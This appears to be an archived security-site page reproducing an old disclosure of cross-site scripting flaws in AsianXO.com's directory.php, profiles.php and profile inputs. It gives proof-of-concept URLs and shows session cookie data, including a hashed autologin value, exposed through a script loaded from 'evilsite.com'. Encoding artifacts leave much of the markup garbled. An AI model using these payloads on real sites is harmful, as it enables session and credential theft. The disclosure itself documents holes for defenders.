Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Specific Sites :: b06-2886.htm

AsianXO.com - XSS with cookie data include



AsianXO.com - XSS with cookie data include
AsianXO.com - XSS with cookie data include



AsianXO.com=0D
=0D
Homepage:=0D
http://www.asianxo.com/=0D 
=0D
Effected files:=0D
directory.php=0D
profiles.php=0D
Input boxes of editing profile=0D
=0D
----------------------------=0D
=0D
XSS Vulnerability via dir_id:=0D
=0D
Directory.php PoC:=0D
<"=0D">http://www.axo2.com/directory.php?dir_id=1"><"=0D 
=0D
Profiles.php PoC using  malformed img tags in front a openended iframe:=0D
http://www.axo2.com/profiles.php?userid=999999999<""> 
=0D
------------------------------=0D
=0D
Another XSS example of profiles.php, this time using allowed html tags 
inaurl injection along with =0D">http://www.axo2.com/profiles.php?userid=99999999<"">





=0D
=0D The output text:=0D =0D This is remote text via xss.js located at evilsite.com phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%2291da4589b012c2fe1ceac1fb2363dbc6%22%3Bs%3A6%3A%22userid%22%3Bs%3A5%3A%2210610%22%3B%7D; phpbb2mysql_sid=362562eaac0fc1d69e574584d4f95e60','gallery','height=500,width=700,status=0');"> =0D =0D When converting the whole string from hex value, we notice a autologinid:# along with our cookie data that has our md5'ed hash pw in it.=0D =0D a:2:{s:11:"autologinid";s:32:"91da4589b012c2fe1ceac1fb2363dbc6";s:6:"userid";s:5:"10610";};=0D =0D NOTE: You can also use and it will create a popup box with the cookie data in it.=0D =0D PoC:=0D




=0D">http://www.axo2.com/profiles.php?userid=99999999<"">




=0D
=0D ---------------------=0D =0D XSS Vulnerability of input boxes when editing profile:=0D =0D The location input box doesn't correctly filter all data, for a XSS example we can enter in double < with ' and no =0D =0D closing >=0D =0D <'


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH